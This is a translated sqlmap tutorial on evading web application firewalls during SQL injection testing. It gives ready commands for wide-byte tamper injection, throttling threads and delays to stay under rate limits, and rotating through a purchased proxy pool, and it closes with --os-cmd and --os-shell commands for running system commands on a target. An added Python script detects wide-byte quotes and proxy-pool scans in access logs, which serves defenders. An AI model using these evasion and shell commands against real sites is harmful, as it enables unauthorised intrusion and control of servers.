Sqlmap tutorial (IV) practical skills three: bypass the firewall
2022-07-07 07:15:00 【A τθ】
Many websites today sit behind a WAF. During a penetration test a lot of operations get blocked: when testing for SQL injection, the WAF intercepts the request traffic, so sqlmap's requests never reach the target and sqlmap cannot tell whether the target is injectable. The WAF intercepts requests it classifies as malicious, and an interception usually blacklists the source IP, so the tester can no longer reach the target at all and the security assessment cannot proceed.
1. List the tamper modules
sqlmap --list-tamper
2. Wide-byte injection
sqlmap -u "http://192.168.127.131/sql/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 4 --current-user
3. Set the thread count
When a WAF is in front of the target, too much concurrency looks like a CC (HTTP flood) attack and the IP gets blocked.
--threads=1 sets the number of threads to 1.
4. Set an HTTP request delay
--delay=DELAY sets the delay, in seconds, between consecutive HTTP requests.
5. Inject through a proxy
sqlmap -u "http://192.168.1.50/06/vul/sqli/sqli_str.php?name=1&submit=1" -p name --dbms mysql -v 1 --proxy=http://192.168.1.107:4455
6. Inject through a proxy pool
After purchasing a proxy pool, fetch the proxies and save them to a file, one ip:port per line, for example proxy.txt:
--proxy-file loads the proxy list from that file.
sqlmap -u "http://192.168.0.136:7766/Less-32/?id=1" --dbms mysql --tamper "unmagicquotes.py" -v 1 --proxy-file=proxy.txt
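From the defender's side, the wide-byte trick in section 2 and the proxy pool in section 6 leave a recognizable footprint in the web server's access log: a high lead byte immediately followed by an encoded quote, and the same path and parameter probed from many distinct source IPs at a low rate. The following Python script is an added example, not part of the original post or of sqlmap; the log lines are constructed, and the ip:port values are documentation addresses standing in for a proxy pool.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes, urlsplit

# Constructed access-log lines (not from the original post). Source IPs are
# documentation addresses standing in for a rotating proxy pool.
LOG_LINES = [
    '198.51.100.1 - - [07/Jul/2022:07:15:01 +0800] "GET /sql/Less-32/?id=1 HTTP/1.1" 200 512',
    '198.51.100.2 - - [07/Jul/2022:07:15:03 +0800] "GET /sql/Less-32/?id=1%bf%27 HTTP/1.1" 500 231',
    '198.51.100.3 - - [07/Jul/2022:07:15:05 +0800] "GET /sql/Less-32/?id=1%bf%27%20AND%201=1--%20- HTTP/1.1" 200 512',
    '198.51.100.4 - - [07/Jul/2022:07:15:07 +0800] "GET /sql/Less-32/?id=1%bf%27%20AND%201=2--%20- HTTP/1.1" 200 480',
    '203.0.113.9 - - [07/Jul/2022:07:15:08 +0800] "GET /index.php?page=about HTTP/1.1" 200 1024',
    '198.51.100.5 - - [07/Jul/2022:07:15:09 +0800] "GET /sql/Less-32/?id=1%df%27 HTTP/1.1" 500 231',
]

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')

# A wide-byte quote is a lead byte 0x81-0xFE immediately followed by a quote:
# under a GBK-style connection charset the backslash that addslashes()/magic
# quotes puts in front of the quote is swallowed into a two-byte character.
WIDE_BYTE_QUOTE = re.compile(rb"[\x81-\xfe]['\"]")

def query_params(url):
    """Yield (name, raw_value_bytes) for each query-string pair."""
    for pair in urlsplit(url).query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            yield name, unquote_to_bytes(value)

def has_wide_byte_quote(url):
    return any(WIDE_BYTE_QUOTE.search(v) for _, v in query_params(url))

def analyze(lines, min_sources=3):
    """Group wide-byte quote hits by (path, parameter) and mark the ones that
    arrive from min_sources or more distinct IPs, the footprint of a scan
    spread over a proxy pool to dodge per-IP WAF blocking."""
    hits = defaultdict(lambda: {"wide_byte_hits": 0, "sources": set()})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["url"]).path
        for name, value in query_params(m["url"]):
            if WIDE_BYTE_QUOTE.search(value):
                entry = hits[(path, name)]
                entry["wide_byte_hits"] += 1
                entry["sources"].add(m["ip"])
    for entry in hits.values():
        entry["distributed"] = len(entry["sources"]) >= min_sources
    return dict(hits)

if __name__ == "__main__":
    for (path, param), entry in analyze(LOG_LINES).items():
        print(path, param, entry)
```

A finding flagged as distributed is the cue to correlate by target parameter rather than by source IP, since per-IP rate limiting is exactly what a proxy pool plus --threads=1 and --delay is designed to slip under.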
7. sqlmap command execution
--os-cmd=OSCMD executes an operating system command.
--os-shell opens an interactive operating system shell.
When the database user at the injection point is a DBA, the two options above can be used: one executes a single command, the other opens an interactive operating system shell.
1. sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-cmd="net user"
2. sqlmap -u "http://www.dm1.com/inj.aspx?id=1" -v 1 --os-shell
With --os-shell, an interactive shell prompt appears where commands can be entered; if the target echoes output, the result of the command execution is returned.